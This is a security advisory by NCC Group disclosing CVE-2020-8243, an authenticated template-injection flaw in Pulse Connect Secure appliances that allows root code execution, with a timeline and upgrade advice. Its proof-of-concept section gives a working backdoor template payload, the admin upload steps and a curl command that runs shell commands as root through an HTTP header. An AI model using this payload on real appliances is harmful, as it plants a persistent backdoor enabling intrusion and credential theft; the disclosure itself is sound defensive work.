Vendor: Pulse Secure Vendor URL: https://www.pulsesecure.net/ Versions affected: Pulse Connect Secure (PCS) 9.1Rx or below, Pulse Policy Secure (PPS) 9.1Rx or below Systems Affected: Pulse Connect Secure (PCS) Appliances Authors: Richard Warren - richard.warren[at]nccgroup[dot]com, David Cash – david.cash[at]nccgroup[dot]com CVE Identifier: CVE-2020-8243 Advisory URL: https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44588 Risk: 7.2 High CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Summary
Pulse Connect Secure (PCS) appliances before 9.1R8.2 suffer from a Perl Template Injection vulnerability which can be exploited by an authenticated administrative user to execute arbitrary code as root.
Impact
The impact of this vulnerability is that an authenticated attacker with access to the administrative console would be able to execute arbitrary code as root on the underlying Operating System. This could be used as a persistent backdoor if brief administrative access was gained (e.g. via XSS, or through credential compromise).
Remote Code Execution on the underlying appliance may allow an attacker to:
- Pivot into the internal network
- Extract and decrypt stored LDAP credentials
- Extract plaintext cached credentials and authenticated session cookies
- Intercept network traffic
Details
Pulse Connect Secure (PCS) allows administrative users to upload custom templates, which can be used to display customised login and meeting pages. These templates are rendered using the Perl Template Toolkit engine.
Although dangerous methods such as INCLUDE, RAWPERL and PERL (via the EVAL_PERL setting) are restricted, Template Toolkit can be coerced into executing by creating a new BLOCK by abusing the “template” global object to create a new block to be evaluated. This is a “feature” that was also abused by the recent Citrix vulnerability (CVE-2019-19781) [1][2][3].
Proof of Concept
A backdoored template file might contain an entry such as the following, within the LoginPage.thtml file:
<%# NetScreen Page Version 9999 %>
<% template.new({ 'BLOCK' => 'system($ENV{HTTP_PULSE_CMD}); die' }) %>
This is then uploaded as a zip file via: /dana-admin/auth/custompage.cgi
Next, create a new sign-in URL under: /dana-admin/auth/signinPolicy.cgi
Set a user URL of */test/ and set the sign-in page to your previously uploaded custom page.
Now you can execute commands like this:
curl -I -L -k https://192.168.1.2/test/ -H "PULSE_CMD: uname -a"
Commands specified in the PULSE_CMD HTTP header will be executed as root.
Note your custom archive will also require the following (blank) files:
• ExceededConcurrent.thtml
• Logout.thtml
• SSL.thtml
Recommendation
Upgrade to Pulse Connect Secure (PCS) 9.1R8.2, Pulse Policy Secure (PPS) 9.1R8.2, or later.
Vendor Communication
- 2020-06-02: Issue reported to vendor
- 2020-09-21: Pulse Connect Secure (PCS) version 9.1R8.2 released
- 2020-09-23: Advisory released by Pulse Secure
- 2020-10-06: NCC Group advisory released
About NCC Group
NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.
Published date: 06/10/2020
Written by: Richard Warren and David Cash
